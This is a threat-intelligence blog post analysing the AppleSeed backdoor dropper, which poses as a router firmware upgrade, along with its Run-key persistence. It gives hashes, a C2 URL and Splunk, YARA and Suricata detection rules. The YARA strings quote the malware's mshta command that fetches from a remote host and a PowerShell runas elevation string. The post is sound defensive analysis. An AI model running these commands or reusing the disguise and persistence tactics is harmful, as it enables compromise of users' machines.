This blog post will briefly cover some additional details of the AppleSeed backdoor originally covered by ASEC’s AhnLab.
As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.
Malware Analysis
MD5: 851e33373114fef45d0fe28c6934fa73
SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f
File name: firmware upgrade installer.exe
FIle type: Win PE
Size: 408kb
As the file name suggests, the executable file is disguised as a router firmware upgrade program and includes a pop-up window to confirm the start of the supposed upgrade, as well as opening iptime.com in the victim’s web browser (Figure 1).
While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.
Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files were not able to be retrieved. Digging in our Sysmon logs, we can see the following file created in AppData\Roaming\Media:
Following the creation of the .db file, regsvr32 is used with the “/s” argument to run silently and not display any message boxes.
The dropper then uses mshta to connect to leomin.dothome.co[.]kr/update/?mode=login. In previous writeups on the AppleSeed backdoor calls to mshta.exe were used for additional malicious behavior.
At the time of writing, the request only returned an HTTP 200 with no follow-on observable behavior.
A handful of randomly named BAT files are created in the %TEMP% directory and run via cmd.exe. Each file is self-deleting, thus further analysis on the files was not possible.
*In addition to the above BAT file, additional .bat files named “2A75”, and “3D24” were also created and executed.
Persistence
SHA256: e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea
Upon the execution and deletion of the final BAT file, persistence is acheived via a DLL named AutoUpdate set as a Registry run key at:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
The above DLL is created at C:\ProgramData\Firmware\Microsoft\Windows\Defender\.
The DLL file is packed using the UPX open source packer, or a similar packer application.
Detection Opportunities
Although Kimsuky goes to considerable lengths to cover their tracks (self-deleting BAT files) and obfuscate the backdoor, not all is lost.
Below, I will list a few Splunk queries that would assist us in hunting for this activity if we didn’t have prior knowledge of the malware’s tactics.
1. Detect Mshta Url
Probably our easiest opportunity is to look for mshta and a Url in the command line. Depending on how prevalent mshta is in your environment, your results may vary.
2. File Creation in Suspicious Path
There likely aren’t many programs in your environment creating executable files in paths like \AppData\Local, so it would be nice to have a fast query to show us when this occurs.
* Inspiration for the below query: https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/
3. Detect regsvr32.exe with “silent” switch
This last query will identify instances where the silent switch is used in conjunction with regsvr32.exe. We’ll harden our query and look for both calling the switch with the forward slash, as well as with a hyphen.
In addition, we will also look for those odd file paths as mentioned above, but this may need tweaking. One weak point for this query is that it does not currently check for regsvr32 being renamed.
Yara Rules
Disclaimer: I am by no means an expert, matter of fact, I am still looking to get my foot in the door in cybersecurity. Please only utilize the below rules for hunting purposes, not in production.
Dropper
rule NK_APT_AppleSeed_Dropper {
meta:
description = ” – file firmware upgrade installer.exe”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f”
strings:
$a = “powershell.exe start-process \”%s\” -argumentlist ‘%s’ -verb runas” fullword wide
$b1 = “mshta.exe http://leomin.dothome.co.kr/update/?mode=login” fullword ascii
$b2 = “USER32.dll” fullword ascii
$b3 = “KERNEL32.dll” fullword ascii
$b4 = “kernel32.dll” fullword wide
$b5 = “mscoree.dll” fullword wide
$b6 = “https://iptime.com” fullword wide
$b7 = “broken pipe” fullword ascii
$b8 = “executable format error” fullword ascii
$b9 = “host unreachable” fullword ascii
$b10 = “connection already in progress” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and
1 of ($a*) and 4 of them
}
AppleSeed DLL
rule NK_APT_AppleSeed_Backdoor {
meta:
description = ” – file AutoUpdate.dll”
author = “Michael Rippey”
reference = “https://asec.ahnlab.com/ko/34883/”
date = “2022-06-01”
hash = “e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea”
strings:
$a1 = “ADVAPI32.dll” fullword ascii
$a2 = “KERNEL32.DLL” fullword ascii
$a3 = “freed.dll” fullword ascii
$a4 = “outlook” fullword wide
$a5 = “CryptEncrypt” fullword ascii
$a6 = “amily not supporte” fullword ascii
$a7 = “connecyar” fullword ascii
$a8 = “rerictaj” fullword ascii
$a9 = “lrgeabik” fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 400KB and
5 of them
}
Suricata Rules
alert http any any -> any any (msg:”NK APT AppleSeed –IOC– domain network connection”; flow:established,to_server; urilen:19; content:”GET”; http_method; content:”/update”; http_uri; content:”?mode=login”; nocase; http_uri; fast_pattern; classtype:trojan-activity; sid:20220601; rev:1; metadata: author “Michael Rippey”, date “2022-06-01”, reference:https://asec.ahnlab.com/ko/34883/;)
MITRE ATT&CK Techniques
ID Technique
T1027 Obfuscated FIle or Information
T1129 Shared Modules
T1547 Persistence, Privilege Escalation
T1566 Phishing
Links/Further Reading
– https://asec.ahnlab.com/ko/34883/
– https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf
Cyber&Ramen 
Comments
One response to “Overview of AppleSeed Dropper”
[…] Mike at “CyberSec & Ramen”Overview of AppleSeed Dropper […]
LikeLike